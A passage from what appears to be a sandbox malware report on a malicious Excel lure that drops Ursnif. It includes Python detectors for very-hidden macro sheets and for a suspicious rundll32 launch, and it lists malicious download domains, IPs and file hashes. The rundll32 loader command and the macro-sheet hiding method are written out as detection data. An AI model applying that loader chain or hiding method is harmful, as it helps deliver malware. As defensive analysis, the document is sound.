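def parse_boundsheet(body: bytes) -> dict:
    """Decode one BoundSheet8 body: offset, flags byte (hsState), type byte (dt), name."""
    lb_ply_pos = struct.unpack_from("<I", body, 0)[0]
    hs_state = body[4] & 0x03          # low two bits of the flag byte
    dt = body[5]                       # sheet type
    cch = body[6]                      # name length in characters
    high_byte = body[7] & 0x01         # 0 = 8-bit chars, 1 = UTF-16LE
    raw = body[8: 8 + (cch * 2 if high_byte else cch)]
    name = raw.decode("utf-16-le" if high_byte else "latin-1")
    return {"name": name, "offset": lb_ply_pos,
            "type": SHEET_TYPES.get(dt, f"unknown-0x{dt:02x}"),
            "state": HIDDEN_STATES.get(hs_state, f"unknown-{hs_state}")}


def list_sheets(stream: bytes) -> list:
    return [parse_boundsheet(body) for rid, body in iter_records(stream) if rid == BOUNDSHEET]


def hidden_macro_sheets(stream: bytes) -> list:
    """Names of XLM (Excel 4.0) macro sheets whose tab is hidden or very hidden."""
    return [s["name"] for s in list_sheets(stream)
            if s["type"] == "macro" and s["state"] != "visible"]


def _rec(rid: int, body: bytes) -> bytes:
    return struct.pack("<HH", rid, len(body)) + body


def _boundsheet(name: str, dt: int, hs_state: int, pos: int) -> bytes:
    encoded = name.encode("latin-1")
    body = struct.pack("<IBB", pos, hs_state, dt) + bytes([len(encoded), 0]) + encoded
    return _rec(BOUNDSHEET, body)


# Constructed Workbook stream (not taken from the analysed document): a visible decoy
# worksheet, a very-hidden Excel 4.0 macro sheet and an ordinary hidden worksheet.
SAMPLE_STREAM = (
    _rec(0x0809, struct.pack("<HHHHII", 0x0600, 0x0005, 0, 0, 0, 0))  # BOF, workbook globals
    + _boundsheet("Sheet1", dt=0x00, hs_state=0, pos=0x100)
    + _boundsheet("Macro1", dt=0x01, hs_state=2, pos=0x200)
    + _boundsheet("Sheet2", dt=0x00, hs_state=1, pos=0x300)
    + _rec(0x000A, b"")                                                 # EOF
)

if __name__ == "__main__":
    for sheet in list_sheets(SAMPLE_STREAM):
        print(sheet)
    print("hidden XLM sheets:", hidden_macro_sheets(SAMPLE_STREAM))
```

A very-hidden sheet does not appear in Excel's Unhide dialog, which is why these loaders prefer state 2 over state 1. To confirm the sheet runs on open, pair this check with a look for an Auto_Open defined name in the workbook's NAME records.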

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE

MITRE ATT&CK Matrix

Techniques are listed per tactic; bracketed digits are the report's per-technique signature badges as exported, and techniques without a badge were not observed.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Scripting [31], Exploitation for Client Execution [33], At (Linux), At (Windows), Cron, Launchd
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Privilege Escalation: Process Injection [11], Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Defense Evasion: Masquerading [121], Disable or Modify Tools [1], Process Injection [11], Scripting [31], Obfuscated Files or Information [1], Rundll32 [1]
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Application Window Discovery [1], File and Directory Discovery [1], System Information Discovery [2], System Network Configuration Discovery, Remote System Discovery, System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Archive Collected Data [1], Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Command and Control: Encrypted Channel [12], Ingress Tool Transfer [1], Non-Application Layer Protocol [1], Application Layer Protocol [2], Fallback Channels, Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features
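The Rundll32 and Masquerading cells above come from one process launch: rundll32 loading ..\fikftkm.thj2 (a PE dropped into the user profile root with a non-DLL extension) through its DllRegisterServer export. The following detection, an added example rather than a Joe Sandbox signature, scores process-creation events for exactly those traits. The events are constructed to mirror the chain in this report; the working directory C:\Users\user\Documents is an assumption (the report only shows that ..\fikftkm.thj2 resolves to C:\Users\user\fikftkm.thj2), and the explorer.exe control-panel launch is a benign decoy.

```python
import ntpath
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
DLL_EXTENSIONS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}
# A file sitting directly in C:\Users\<name>\ rather than in a subfolder.
USER_PROFILE_ROOT = re.compile(r"^[a-z]:\\users\\[^\\]+\\[^\\]+$", re.IGNORECASE)
# rundll32[.exe] <module>,<export> [args]; the module may be quoted.
RUNDLL32_CMD = re.compile(
    r'^\s*(?:"[^"]*rundll32(?:\.exe)?"|\S*rundll32(?:\.exe)?)\s+'
    r'(?:"(?P<q>[^"]+)"|(?P<u>[^,\s]+))(?:,(?P<export>\S*))?',
    re.IGNORECASE,
)


def parse_rundll32_cmdline(cmdline: str):
    """Return (module, export) from a rundll32 command line, or None if it has no module."""
    m = RUNDLL32_CMD.match(cmdline)
    if not m:
        return None
    module = m.group("q") or m.group("u")
    return module, (m.group("export") or "")


def assess_rundll32_event(event: dict) -> list:
    """Return the suspicious traits of one process-creation event (empty if none)."""
    reasons = []
    if ntpath.basename(event["image"]).lower() != "rundll32.exe":
        return reasons
    parsed = parse_rundll32_cmdline(event["command_line"])
    if parsed is None:
        return ["rundll32 without a module argument"]
    module, export = parsed
    # A bare name (shell32.dll) goes through the loader search path, so only
    # resolve paths that actually contain a directory component.
    has_dir = "\\" in module or "/" in module
    resolved = ntpath.normpath(ntpath.join(event["cwd"], module)) if has_dir else module
    ext = ntpath.splitext(resolved)[1].lower()
    if ext not in DLL_EXTENSIONS:
        reasons.append(f"module has non-DLL extension {ext or '(none)'}")
    if has_dir and not ntpath.isabs(module):
        reasons.append("module given as relative path")
    if USER_PROFILE_ROOT.match(resolved):
        reasons.append("module lives directly in a user profile root")
    if export.lower() == "dllregisterserver":
        reasons.append("DllRegisterServer export called via rundll32")
    if ntpath.basename(event["parent_image"]).lower() in OFFICE_APPS:
        reasons.append("spawned by an Office application")
    return reasons


def flag_suspicious(events, threshold: int = 2):
    """Return (image, reasons) for events that accumulate at least `threshold` traits."""
    hits = []
    for ev in events:
        reasons = assess_rundll32_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev["image"], reasons))
    return hits


# Constructed process-creation events modelled on this report's chain (cwd is assumed).
EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32 ..\fikftkm.thj2,DllRegisterServer",
     "cwd": r"C:\Users\user\Documents"},
    {"parent_image": r"C:\Windows\System32\rundll32.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "command_line": r"rundll32 ..\fikftkm.thj2,DllRegisterServer",
     "cwd": r"C:\Users\user\Documents"},
    {"parent_image": r"C:\Windows\explorer.exe",            # benign decoy
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL",
     "cwd": r"C:\Windows\System32"},
]

if __name__ == "__main__":
    for image, reasons in flag_suspicious(EVENTS):
        print(image, "->", "; ".join(reasons))
```

The second event (System32 rundll32 re-launching itself from SysWOW64) is the WoW64 hop a 64-bit rundll32 takes when handed a 32-bit DLL; it loses the Office-parent trait but keeps the other four, so a threshold of two still catches both hops.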

Behavior Graph

(The process and behavior graph is an image and is not reproduced in this text export.)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
document-1245492889.xls | 54% | Virustotal | -
document-1245492889.xls | 35% | Metadefender | -
document-1245492889.xls | 18% | ReversingLabs | Document-Excel.Trojan.IcedID
Note that the ReversingLabs label names IcedID while the Yara matches in this report identify the unpacked rundll32 payload as Ursnif; a vendor label on the lure document is a family hint at best, and the in-memory match against the unpacked payload is the stronger evidence.

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\fikftkm.thj2 | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif | 100% | Joe Sandbox ML | -

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe (three identical entries)
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe (three identical entries)

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mundotecnologiasolar.com | 162.241.62.4 | true | false | - | unknown
accesslinksgroup.com | 192.185.129.4 | true | false | - | unknown
ponchokhana.com | 5.100.155.169 | true | false | - | unknown
vts.us.com | 207.174.213.126 | true | false | - | unknown
comosairdoburaco.com.br | 198.50.218.68 | true | false | - | unknown

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation

http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
  Source: rundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp; rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp; rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmp
  Malicious: false | Antivirus Detection: - | Reputation: high

http://www.windows.com/pctv.
  Source: rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmp
  Malicious: false | Antivirus Detection: - | Reputation: high

http://investor.msn.com
  Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp; rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmp
  Malicious: false | Antivirus Detection: - | Reputation: high

http://www.msnbc.com/news/ticker.txt
  Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp; rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmp
  Malicious: false | Antivirus Detection: - | Reputation: high

http://www.icra.org/vocabulary/.
  Source: rundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp; rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp; rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmp
  Malicious: false | Antivirus Detection: URL Reputation: safe (three entries) | Reputation: unknown

http://windowsmedia.com/redir/services.asp?WMPFriendly=true
  Source: rundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp; rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp; rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmp
  Malicious: false | Antivirus Detection: URL Reputation: safe (three entries) | Reputation: unknown

http://www.hotmail.com/oe
  Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp; rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmp
  Malicious: false | Antivirus Detection: - | Reputation: high

http://investor.msn.com/
  Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp; rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmp
  Malicious: false | Antivirus Detection: - | Reputation: high

None of these URLs is flagged malicious, and each recurs at the same image-mapped memory regions across every rundll32.exe instance, which is what Windows library resource strings look like; they are not indicators for this sample. The contacted domains above are the sample-specific network indicators.

                                Contacted IPs


                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
207.174.213.126 | vts.us.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRY (US) | false
198.50.218.68 | comosairdoburaco.com.br | Canada | 16276 | OVH (FR) | false
162.241.62.4 | mundotecnologiasolar.com | United States | 46606 | UNIFIEDLAYER-AS-1 (US) | false
5.100.155.169 | ponchokhana.com | United Kingdom | 394695 | PUBLIC-DOMAIN-REGISTRY (US) | false
192.185.129.4 | accesslinksgroup.com | United States | 46606 | UNIFIEDLAYER-AS-1 (US) | false

                                General Information

                                Joe Sandbox Version:31.0.0 Emerald
                                Analysis ID:383157
                                Start date:07.04.2021
                                Start time:10:55:10
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 7m 59s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:document-1245492889.xls
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:12
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winXLS@13/17@5/5
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 98.4% (good quality ratio 85.8%)
                                • Quality average: 64.1%
                                • Quality standard deviation: 33.3%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .xls
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Found warning dialog
                                • Click Ok
                                • Attach to Office via COM
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 23.0.174.185, 23.0.174.200, 192.35.177.64
                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net, apps.identrust.com
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.

                                Simulations

                                Behavior and APIs

Time | Type | Description
10:57:08 | API Interceptor | 1x Sleep call for process: rundll32.exe modified

                                Joe Sandbox View / Context

                                IPs

Match | Associated Sample Name / URL | Detection | Context

207.174.213.126 (all associated samples detected malicious):
  document-1305160161.xlsb (context: nhseven.tk/ds/08.gif)
  document-414236719.xlsb (context: nhseven.tk/ds/08.gif)
  document-1249966242.xlsb (context: nhseven.tk/ds/08.gif)
  http://anandice.ac.in/Paid-Invoice-Credit-Card-Receipt/ (context: anandice.ac.in/Paid-Invoice-Credit-Card-Receipt/)

198.50.218.68 (all associated samples detected malicious, no context recorded):
  document-1048628209.xls, document-1771131239.xls, document-1370071295.xls, document-69564892.xls, document-1320073816.xls, document-184653858.xls, document-1729033050.xls, document-1268722929.xls, document-540475316.xls, document-1456634656.xls, document-12162673.xls, document-997754822.xls, document-1376447212.xls, document-1813856412.xls, document-1776123548.xls, document-1201008736.xls, document-684762271.xls, document-1590815978.xls, document-800254041.xls, document-469719570.xls

                                                                        Domains

Match | Associated Sample Name / URL | Detection | Context

ponchokhana.com (all associated samples detected malicious; context for every entry: 5.100.155.169):
  FED8GODpaD.xlsb, catalogue-41.xlsb, document-1048628209.xls, document-1771131239.xls, document-1370071295.xls, document-69564892.xls, document-1320073816.xls, document-184653858.xls, document-1729033050.xls, document-1268722929.xls, document-540475316.xls, document-1456634656.xls, document-12162673.xls, document-997754822.xls, document-1376447212.xls, document-1813856412.xls, document-1776123548.xls, document-1201008736.xls, document-684762271.xls, document-1590815978.xls

mundotecnologiasolar.com (all associated samples detected malicious; context for every entry: 162.241.62.4):
  document-1048628209.xls, document-1771131239.xls, document-1370071295.xls, document-69564892.xls, document-1320073816.xls, document-184653858.xls, document-1729033050.xls, document-1268722929.xls, document-540475316.xls, document-1456634656.xls, document-12162673.xls, document-997754822.xls, document-1376447212.xls, document-1813856412.xls, document-1776123548.xls, document-1201008736.xls, document-684762271.xls, document-1590815978.xls, document-800254041.xls, document-469719570.xls

accesslinksgroup.com (all associated samples detected malicious; context for every entry: 192.185.129.4):
  document-1048628209.xls, document-1771131239.xls, document-1370071295.xls, document-69564892.xls, document-1320073816.xls, document-184653858.xls, document-1729033050.xls, document-1268722929.xls, document-540475316.xls, document-1456634656.xls, document-12162673.xls, document-997754822.xls, document-1376447212.xls, document-1813856412.xls, document-1776123548.xls, document-1201008736.xls, document-684762271.xls, document-1590815978.xls, document-800254041.xls, document-469719570.xls

The same twenty document-*.xls samples recur under 198.50.218.68, mundotecnologiasolar.com and accesslinksgroup.com, and eighteen of them under ponchokhana.com: the lures in this campaign share one pool of download hosts, so blocking the five contacted domains and their IPs covers the sibling samples as well as this one.

                                                                        ASN

                                                                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                        JA3 Fingerprints

                                                                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                        Category:dropped
                                                                        Size (bytes):58596
                                                                        Entropy (8bit):7.995478615012125
                                                                        Encrypted:true
                                                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                        MD5:61A03D15CF62612F50B74867090DBE79
                                                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):893
                                                                        Entropy (8bit):7.366016576663508
                                                                        Encrypted:false
                                                                        SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                        MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                        SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                        SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                        SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):326
                                                                        Entropy (8bit):3.1146655678160093
                                                                        Encrypted:false
                                                                        SSDEEP:6:kKOO3PkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:J3PkwTJrkPlE99SNxAhUe0ht
                                                                        MD5:933FF45DA6B4A343AEEC08A091A0BAEE
                                                                        SHA1:41E1BB9E9E742EB28DBE56E40BCA6F81B1E26CF1
                                                                        SHA-256:18AAC2CBE90A2C0EB724E76527F9DD392C5F90C601D2945AE5BD38E3D7EC3B17
                                                                        SHA-512:10968A1112C238A32E24B756CD383825BEC08D823605767334380EC7266863597460FE7455628C7200C34F324F8C21E53F58CEDC75FAAEF2DF8710742DE60719
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: p...... ..........8.+..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):252
                                                                        Entropy (8bit):3.01359045659566
                                                                        Encrypted:false
                                                                        SSDEEP:3:kkFkle73/tfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKFjnliBAIdQZV7eAYLit
                                                                        MD5:4B29AE3F4B4A3D5A3E8F2369603F007B
                                                                        SHA1:9408647A0936E4ED1D803963436369E2FFEA7AA1
                                                                        SHA-256:1A35BA761920227FB7A7FCB72F10AB5A5598EA5AAA26ED01CFAA0B2A568B6877
                                                                        SHA-512:397BE9E0ACFBDDD9A2630677F8172A3BFFF600C42BA8C852395188531318798E94DB66F00565B3AF92F54D3332F2758AE3D077D690738BE64B237C243881FC53
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: p...... ....`...]..9.+..(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\suspendedpage[1].htm
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                        Category:downloaded
                                                                        Size (bytes):7614
                                                                        Entropy (8bit):5.643196429180972
                                                                        Encrypted:false
                                                                        SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJcf:QJvVGaRF8I80
                                                                        MD5:116091ED739B7E0F1AD7F819560A0602
                                                                        SHA1:C30A527A2A5F25BC1A63359CAD76A8BAB67CB4FB
                                                                        SHA-256:0445F0A98A263C472AE1C8D8E28275AFEA1BDDD7692746AA5286097B311B29B1
                                                                        SHA-512:83F16BCA5EA4062470B8807912F10B6D743C2DEF2261B4E16098EA8FC1DCB6692CBBD4C6870F27408422B75A3CDCD46A3856AB2162177ED2386D4B8188C122E8
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        IE Cache URL:https://vts.us.com/cgi-sys/suspendedpage.cgi
                                                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\suspendedpage[1].htm
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                        Category:downloaded
                                                                        Size (bytes):7624
                                                                        Entropy (8bit):5.642596381720329
                                                                        Encrypted:false
                                                                        SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJf0:QJvVGaRF8I80
                                                                        MD5:190F2D4BCDE1E366EAAB903C29C7A699
                                                                        SHA1:346D44A0619C97AA226EF52F146F9A133F4DCAAF
                                                                        SHA-256:20C2D643754869BA5763DDC6289A0FADBBF2DE81236F1F80B7FA3588B14F6EBB
